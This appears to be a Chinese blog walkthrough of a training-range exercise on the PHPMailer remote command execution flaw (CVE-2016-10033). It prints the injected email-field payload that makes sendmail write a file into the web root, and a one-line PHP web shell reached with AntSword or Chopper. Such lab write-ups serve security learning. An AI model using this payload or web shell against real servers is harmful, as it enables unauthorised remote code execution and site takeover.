当前位置:网站首页>墨者学院-PHPMailer远程命令执行漏洞溯源
墨者学院-PHPMailer远程命令执行漏洞溯源
2022-07-04 07:40:00 【Lyswbb】
拿到靶场之后点击访问


工具
分享一个小工具,用来爬取相关的url Link Gopher

可以看到有用的就一个mail.php

进入之后来到一个邮件测试页面,很明显这里是一个功能点

phpmailer介绍
PHPMailer是一个用于发送电子邮件的PHP函数包。直接用PHP就可以发送,无需搭建复杂的Email服务。相关漏洞CVE编号(CVE-2016-10033)
burp抓包,更改email处payload为
"aaa". -OQueueDirectory=/tmp/. -X/var/www/html/1.php @aaa.com更改message处payload为
<?php @eval($_POST[cmd]);?>
然后访问http://124.70.71.251:44768/1.php,使用蚁剑或者菜刀连接即可

边栏推荐
- 神经网络入门(下)
- Introduction to sap commerce cloud B2B organization function
- System architecture design of circle of friends
- Summary of MySQL common judgment functions!! Have you used it
- tornado项目之路由装饰器
- The text box displays the word (prompt text) by default, and the text disappears after clicking.
- The idea of implementing charts chart view in all swiftui versions (1.0-4.0) was born
- 【Kubernetes系列】Kubernetes 上安装 KubeSphere
- When JDBC connects to es query, is there a God who meets the following situation?
- Tri des fonctions de traitement de texte dans MySQL, recherche rapide préférée
猜你喜欢

BUUCTF(3)

Boosting the Performance of Video Compression Artifact Reduction with Reference Frame Proposals and

Introduction to sap commerce cloud B2B organization function

Tri des fonctions de traitement de texte dans MySQL, recherche rapide préférée

Improve the accuracy of 3D reconstruction of complex scenes | segmentation of UAV Remote Sensing Images Based on paddleseg

User login function: simple but difficult

Book list | as the technical support Party of the Winter Olympics, Alibaba cloud's technology is written in these books!

大学阶段总结

Comparison between applet framework and platform compilation

Technical experts from large factories: common thinking models in architecture design
随机推荐
Blog stop statement
Zephyr 學習筆記2,Scheduling
Adaptive spatiotemporal fusion of multi-target networks for compressed video perception enhancement
Xcode 14之大变化详细介绍
flask-sqlalchemy 循环引用
MySQL中的文本處理函數整理,收藏速查
Distributed transaction management DTM: the little helper behind "buy buy buy"
Introduction to rce in attack and defense world
The IP bound to the socket is inaddr_ The meaning of any htonl (inaddr_any) (0.0.0.0 all addresses, uncertain addresses, arbitrary addresses)
Handwritten easy version flexible JS and source code analysis
OKR vs. KPI 一次搞清楚这两大概念!
Book list | as the technical support Party of the Winter Olympics, Alibaba cloud's technology is written in these books!
zabbix監控系統自定義監控內容
zabbix 5.0监控客户端
Enter the year, month, and determine the number of days
Activiti常见操作数据表关系
弈柯莱生物冲刺科创板:年营收3.3亿 弘晖基金与淡马锡是股东
Chain ide -- the infrastructure of the metauniverse
Easy to understand: understand the time series database incluxdb
Relations courantes de la fiche de données d'exploitation pour les activités